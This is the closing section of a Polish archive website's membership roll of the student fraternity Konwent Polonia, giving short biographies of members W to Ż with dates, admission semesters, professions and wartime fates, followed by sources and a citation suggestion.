 1437. Wilhelm Wróblewski, (1809 - przed 1852) - coetus I sem. 1832, lekarz w Kiejdanach [33]
 1438. Otton Wüstehube, (1832 - 1902) - coetus II sem. 1852, pastor e.a. superintendent warszawski [434]
 1439. Bohdan Wydżga, (1858-1933) - s. Wincentego, coetus I sem. 1881, adwokat, konsul RP w Paryżu, literat, poeta - znakomity tłumacz Baudelaire’a i Verlaine’a, ogromnie czynny i zasłużony dla Konwentu, Prezes Stowarzyszenia Filistrów w Warszawie, historyk Konwentu, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA [863]
 1440. Feliks Wyganowski, (1863 - 1938) - s. Zygmunta, brat Jana (993), coetus I sem. 1887, notariusz w Warszawie [991]
 1441. Jan Wyganowski, (1867 - 1925) - s. Zygmunta, brat Feliksa (991), coetus I sem. 1887, prawnik, sędzia, rejent w Kaliszu [993]
 1442. Władysław Wyrzykowski, (1877 - 1942) - s. Władysława, coetus II sem. 1899, mjr. WP, lekarz w Harbinie, Toruniu [1128]
 1443. Aleksander Wysłouch, (1815 - ?) - ziemianin z guberni grodzieńskiej (powiat Prużany), coetus I sem. 1835 [84]
 1444. Zenon Wysłouch, (1817 - 1837) - z guberni grodzieńskiej, coetus II sem. 1836, zmarł w czasie studiów [102]
 1445. Jerzy Wyszkowski, (1913 - 1936) - coetus II sem. 1933/34 [1481]
 1446. Arkadiusz Wyszomirski, (1910 - 3 sierpnia 1985) - coetus I sem. 1929/30, lekarz w Szpitalu Dzieciątka Jezus w Warszawie, w kamp. wrześniowej - lekarz batalionowy. W czasie wojny ppor. ZWZ - AK (Warszawa). Po wojnie lekarz (doktor medycyny) w Łodzi, Warszawie [1432]
 1447. Karol Wyszomirski, (1827 - ?) - coetus I sem. 1853, lekarz na Lubelszczyźnie [455]
 1448. Stanisław Antoni Wyszyński, (1899 - ?) - ochot. WP (1920), coetus II sem. 1922/23 [1360]
 1449. Konstanty Young (Jung), (1829 - 1868) - coetus I sem. 1850, pastor e.r. Szwabiszkach [352]
 1450. Bolesław Zaborowski, (1867 - 1919) - z siedleckiego, coetus II sem. 1888, lekarz w Międzyrzecu [1032]
 1451. Michał Zaborowski, (1872 - 1903) - s. Stanisława, coetus II sem. 1890, lekarz w Warszawie [1064]
 1452. Bronisław Zaborski, (1885-1945) -s. Ignacego, brat Karola (1002), coetus II sem. 1907, adwokat w W-wie, zamordowany w Sachsenhausen [1190]
 1453. Karol Zaborski, (1868 - 1929) -s. Ignacego, brat Bronisława (1190), coetus II sem. 1887, lekarz, ziemianin (Litwa Kowieńska) [1002]
 1454. Jerzy Zahorski, (1916-1944) - s. Wacława, coetus II sem. 1934/35. Prezes K! w czasie obchodów 110-lecia. Ppor. AK. (wileński „Kedyw”), odzn. Krzyżem Walecznych. Aresztowany w lipcu 1943 r. przez Gestapo, zamordowany (5 IV) [1486]
 1455. Witold Zahorski, (1848 - 1933) - coetus I sem. 1868, współautor muzyki do konwentowej „operetki” Na kwaterze, później inżynier górnik [659]
 1456. Julian Zajączkowski, (1841 -1878) - s. Hilarego, coetus II sem. 1858, lekarz, zmarł na tyfus w czasie wojny rosyjsko - tureckiej w Bułgarii [575]
 1457. Kazimierz Zajączkowski, (1904 - 6 czerwca 1973) - s. Walentego, ochotnik WP (1920), coetus I sem. 1924/25, V-prokurator Sądu Okręgowego w Toruniu, ppor. WP, w 1939 r. wzięty do niewoli w bitwie pod Kutnem - oflag Murnau. Po wojnie w sądownictwie na Mazurach (Giżycko - Olsztyn) [1382]
 1458. Bolesław Zakrzewski, (1886 - 1922) - brat Włodzimierza (1180), coetus II sem. 1907, zmarł w Turkiestanie [1189]
 1459. Włodzimierz Zakrzewski I, (1888- po 1939) - brat Bolesława (1189), coetus II sem. 1907, v-prezes Sądu Okręgowego w Równem, wywieziony, zaginął w ZSRR [1188]
 1460. Włodzimierz Zakrzewski II, (1885 - po 1947) - coetus II sem. 1910, notariusz w Kościeszynie, Tyszowcach, Kozienicach, Zwoleniu [1254]
 1461. Adam Zaleski, (1828 - ?) - brat Leona (372), ziemianin w pow. brzeskim, coetus II sem. 1850 [373]
 1462. Bronisław Zaleski, (1819 - 1880) - s. Franciszka, coetus I sem. 1837, spiskowiec, zesłaniec, emigrant, historyk, wydawca [123]
 1463. Feliks Zaleski, (1826 - 1899) - s. Franciszka, coetus I sem. 1850, lekarz, zesłany za powst. 1863 r. [356]
 1464. Jan Stanisław Zaleski, (1860 - 1943) - s. Achillesa, brat Szczęsnego (778), coetus II sem. 1878, lekarz w Sierpcu [801]
 1465. Kazimierz Zaleski, (1847 - 1898) - s. Wilhelma, coetus I sem. 1873, dr praw, sędzia [716]
 1466. Leon Zaleski, (1829 - ?) - brat Adama (373), ziemianin w pow. brzeskim, coetus II sem. 1850 [372]
 1467. Stanisław Zaleski, (1867 - 1933) - s. Władysława, coetus II sem. 1889, dr chemii, przemysłowiec, kolekcjoner minerałów [1043]
 1468. Szczęsny Zaleski, (1856 - ?) - s. Achillesa, brat Jana (801), ziemianin z Podola, coetus II sem. 1877 [778]
 1469. Wiktor Zaleski, (1815 - przed 1852) - coetus II sem. 1833, ziemianin z Białostocczyzny [59]
 1470. Bolesław Zalewski, (1833 - 1858) - ziemianin z Białostocczyzny, coetus I sem. 1852 [419]
 1471. Konstanty Zalewski, (1838 - ?) - coetus I sem. 1858, lekarz w gub. grodzieńskiej [571]
 1472. Paweł Zalewski, (1835 - ?) - coetus II sem. 1857, lekarz w Brześciu Lit. [560]
 1473. Stanisław Zalewski, (1893 - lipiec 1939) -s. Kazimierza, coetus II sem. 1912, radca MSZ, poseł na sejm z ramienia ND, ziemianin [1272]
 1474. Stefan Załęski, (1886 - po 1934) - coetus II sem. 1907, prawo, major WP [1194]
 1475. Witold Załęski, (1836 - 1908) - s. Karola, coetus II sem. 1855, doc. Szkoły Głównej, statystyk [513]
 1476. Klemens Zan, (1851 - 1889) - s. Tomasza (Filomaty), coetus I sem. 1871, adwokat w Wilnie, spiskowiec, zabity przez carską Ochranę. Kazimiera Iłłakowiczówna - poetka, była jego córką [686]
 1477. Henryk Zander, (1838 - 1911) - coetus II sem. 1857, pastor e.a. w Kielcach [566]
 1478. Juliusz Zander, (1888 - ?) - z Dyneburga, coetus II sem. 1907 [1210]
 1479. Paweł Zaorski, (1863 - 1894) - coetus II sem. 1886, chemik w hucie cynkowej w Zagórzu k. Sosnowca, w 1892 r. aresztowany (w drukarni konspiracyjnej), osadzony w Cytadeli Warszawskiej, zmarł wkrótce po wypuszczeniu na wolność [972]
 1480. Adolf Downar-Zapolski, (1815 - 1854) - s. Józefa, coetus I sem. 1841, lekarz. Zmarł wkrótce po studiach [189]
 1481. Izydor Zaremba, (1821 - przed 1889) - coetus I sem. 1841, urzędnik w Kijowie [183]
 1482. Aleksander Zawisza, (1858 - 1910) - coetus II sem. 1878, autor Statutu Konwentu, członek pierwszego Stałego Sądu Honorowego (1881), lekarz na Syberii, gdzie zmarl [791]
 1483. Władysław Zawisza, (1815 - po 1889) - s. Szymona, coetus II sem. 1837, uczestnik spisku K. Hildebrandta, zesłany [126]
 1484. Aleksander Zdrodowski, (1815 - po 1889) - s. Henryka, coetus I sem. 1836, uczestnik spisku Hildebrandta, zesłany [97]
 1485. Jarosław Zdrojewski, (1912 - grudzień 1969) - rtm. WP, żołnierz września, internowany na Litwie, wydostał się na Zachód. Odkomenderowany do ZSRR był adiutantem gen. Szyszko-Bohusza. Wyszedł z II Korpusem. Za kampanię włoską odznaczony Krzyżem Walecznych. Po wojnie emigrował do Argentyny [1468]
 1486. Marian Zdziechowski, (30 kwietnia 1861 w Nowosiółkach - 5 października 1938 w Wilnie) - s. Edmunda i Heleny Puljanowskiej, brat Józefa (Arkonia), c. II sem. 1880 Konwent Polonia [nr ew. 845], krytyk, historyk literatury i kultury, filozof, prof. U.J., prof. dziekan, rektor USB, dr h. c. Uniwersytetu w Tartu, członek PAU, członek honorowy Korporacji Ruthenia Vilnensis
 1487. Teofil Zdzieński, (1831 - 1890) - coetus I sem. 1852, lekarz w Warszawie [418]
 1488. Ignacy Zenowicz, (1825 - ?) - ziemianin z Wileńszczyzny, coetus II sem. 1847 [297]
 1489. Zenon Zenowicz, (1827 - ?) - ziemianin z Wileńszczyzny, coetus I sem. 1848 [304]

  Leszek Zgliczyński, Warszawa 2007 r.

 1490. Leszek Zgliczyński, (20 listopada 1914 - 2 października 2008 w Warszawa) - s. Stefana, coetus II sem. 1933/34, żołnierz - lekarz września, po wojnie prof. (1974) i rektor (1972 - 1979) Akademii Medycznej w Warszawie. Wybitny radiolog. Autor podręcznika Radiologia (1968 - wielokrotnie wznawiany). Odznaczony Krzyżem Komandorskim Orderu Polonia Restituta [1484] szerzej vide nekrolog: Aktualności 2008

 1491. Karol Ziegler, (1835 - 1861) - coetus II sem. 1853, pastor e.a., wikariusz w Łodzi [465]
 1492. Nestor Ziegler, (1805 - 1834) - założyciel Konwentu Polonia, lekarz w guberni kowieńskiej [5]
 1493. Erazm Zieleński, (1887 - 1935) - s. Kazimierza, coetus I sem. 1909, ziemianin. Czł. Rady Nadzorczej S.A. „Polskie Radio” [1233]
 1494. Władysław Zieliński, (1859 - po 1928) - coetus I sem. 1880, ziemianin z Płockiego [834]
 1495. Józef Kazimierz Ziemacki, (1856 - 1925) - s. Franciszka, coetus I sem. 1880, lekarz, prof. i pierwszy rektor odrodzonego Uniw. Wileńskiego, pierwszy wileński Kurator Konwentu.[832]
 1496. Kalikst Ziemiański, (1855 - ?) - z Wołynia, coetus I sem. 1877 [763]
 1497. Bronisław Ziemiński, (1860 - 1915) - s. Leonarda, coetus II sem. 1878, lekarz - oftalmolog w Warszawie, autor podręcznika „Zarys okulistyki” (W. 1909, 2 wyd. 1930), założyciel i prezes Towarzystwa Okulistycznego [790]
 1498. Władysław Zienkowicz (Zenkowicz), (1814 - ?) - ziemianin w guberni wileńskiej, coetus I sem. 1834 [65]
 1499. Rudolf Zirkwitz, (1829 -1895) - s. Fryderyka, coetus I sem. 1849, pastor e. a. w Włocławku [327]
 1500. Teodor Zirkwitz, (1863 - 1945) - s. Rudolfa (327), coetus I sem. 1883, pastor e.a. w Białymstoku, kapelan WP (1920-27) [897]
 1501. Reinhold Wilhelm Zimmer, (1831 - 1898) - coetus II sem. 1854, pastor e.a. w Pabianicach [499]
 1502. Bolesław Zmaczyński, (1854 - ?) - coetus II sem. 1873, inżynier w Rosji [723]
 1503. Emil Zmaczyński, (1889 - ?) - z gub. mińskiej, coetus II sem. 1907 [1187]
 1504. Edward Żagiell, ( 1840 - ?) - ziemianin z gub. kowieńskiej, coetus I sem. 1860 [597]
 1505. Aleksander Żeligowski, (1816- ?) - s. Juliana, brat Edwarda (52), coetus II sem. 1833, uczestnik spisku K. Hildebrandta, zesłaniec [53]
 1506. Edward Żeligowski, (1816 - 1864) - s. Juliana, brat Aleksandra (53), coetus II sem. 1833, uczestnik spisku K. Hildebrandta, zesłaniec, emigrant. Poeta [52]
 1507. Jerzy Żułkwa, (1910 - 1961) - coetus I sem. 1931/32, ppor. WP, żołnierz września, w oflagu. Po wojnie aktor w Teatrze im. Jaracza w Olsztynie [1454]
 1508. Oswald Żuk, (1898 - po 1934) - ochotnik WP (1918 - 1921), coetus II sem. 1920/21 [1334]
 1509. Kazimierz Żukowski, (1915 - 12 lipca 2000 w Gdynii) - s. Antoniego, coetus II sem. 1937/38, ppor. WP, żołnierz września, żołnierz .AK (inspektorat Oszmiana). W styczniu 1945 wywieziony do ZSRR. Po powrocie, dr ekon., doc. Morskiego Instytutu Rybackiego [1505]
 1510. Włodzimierz Żukowski, (ok. 1915? - po 1961) - coetus I sem. 1938/39, po wojnie pozostał w Wilnie, pracował na kolei [1510]
 1511. Zygmunt Żółtowski, (1882 - ?) - ziemianin z Kowieńszczyzny [1199]
 1512. Kazimierz Życki, (ok. 1874 - po 1939) - w Warszawie, coetus I i II sem. 1894, początkowo farmaceuta, następnie działacz społeczny, właściciel modnych kawiarni „Udziałowa”, „Pod Pikadorem” [1097]

Okładka broszury A. Minkiewicza pt. Konwent Polonia 1928-1978 r.

Listę członków opracowano na podstawie:

1) Jan Trynkowski, Album Polonorum, www.konwentpolonia.pl, wyd. 6, stan grudzień 2008; Jan Trynkowski, Album Polonorum (fragmenty), 2008-2013,

2) materiałów archiwalnych z Archiwum Korporacyjnego,

3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Konwentu Polonia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 14 II 2010 r.
Ostatnia zmiana: 22 XII 2021 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Konwent Polonia 1828-1989 (Dorpat, Warszawa, Wilno, Londyn), (na:) www.archiwumkorporacyjne.pl, stan 22 XII 2021 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }